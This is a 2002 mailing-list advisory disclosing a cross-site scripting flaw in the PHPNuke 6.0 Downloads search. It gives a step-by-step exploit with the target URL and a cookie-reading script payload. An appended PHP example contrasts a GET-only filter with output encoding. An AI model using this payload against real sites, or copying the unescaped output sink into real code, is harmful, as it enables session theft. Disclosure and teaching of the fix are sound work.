XSS bug in PHPNuke 6.0

From: Arab VieruZ (arabviersusat_private)
Date: Thu Oct 10 2002 - 15:19:41 PDT

    Vulnerable systems:
    PHPNuke 6.0 & maybe all
    
    Exploit:
    1- go to http://[target]/modules.php?name=Downloads&d_op=search
    
    2- put this code in the search form:
    
    <Scr*ipt>javascript:alert(document.cookie)</Scr*ipt>
    
    3- click "Search"
    
    (without "*")
    
    you can't use it in a URL like this
    
    http://[target]/modules.php?
    name=Downloads&d_op=search&query=<Scri*pt>javascript:alert(document.cookie)
    </Scri*pt>
    
    it will write "I don't like you..." me 2 :)
    
    ----------------------------------
    Arab Vieruz
    
    thanx
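
Added example, not code from the post or from PHP-Nuke: it contrasts an input filter that looks only at query-string parameters with output encoding at the point where the search term is written into the page. That the filter is GET-only is an assumption, one explanation consistent with the post's report that the URL form is rejected while the form submission is not; all function names are hypothetical.

```php
<?php
// Added illustration; not PHP-Nuke source. All function names are hypothetical.

// Assumed input filter: inspects query-string parameters only, which would
// explain a rejected URL alongside an accepted form submission.
function get_only_filter(array $get): bool
{
    foreach ($get as $value) {
        if (is_string($value) && preg_match('/<\s*script/i', $value)) {
            return false; // request rejected
        }
    }
    return true;
}

// Vulnerable sink: the search term is written into the HTML unescaped.
function render_results_unsafe(string $query): string
{
    return '<p>Search results for: ' . $query . '</p>';
}

// Hardened sink: encode for the HTML context at output time, so the page
// is safe no matter which request method carried the value.
function render_results_safe(string $query): string
{
    return '<p>Search results for: '
        . htmlspecialchars($query, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
        . '</p>';
}

// Constructed sample input standing in for any submitted markup.
$term = '<script>alert(1)</script>';

// The same value sent two ways. The filter is only ever handed the GET array.
$viaUrl  = ['name' => 'Downloads', 'd_op' => 'search', 'query' => $term];
$viaForm = ['get'  => ['name' => 'Downloads', 'd_op' => 'search'],
            'post' => ['query' => $term]];

// URL submission: the filter sees the term and rejects the request.
var_dump(get_only_filter($viaUrl));
// Form submission: the term travels in the body, so the filter has nothing to match.
var_dump(get_only_filter($viaForm['get']));

// Unescaped sink: the markup reaches the page as markup.
echo render_results_unsafe($viaForm['post']['query']), "\n";
// Encoded sink: the same value is rendered as inert text.
echo render_results_safe($viaForm['post']['query']), "\n";
```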
    


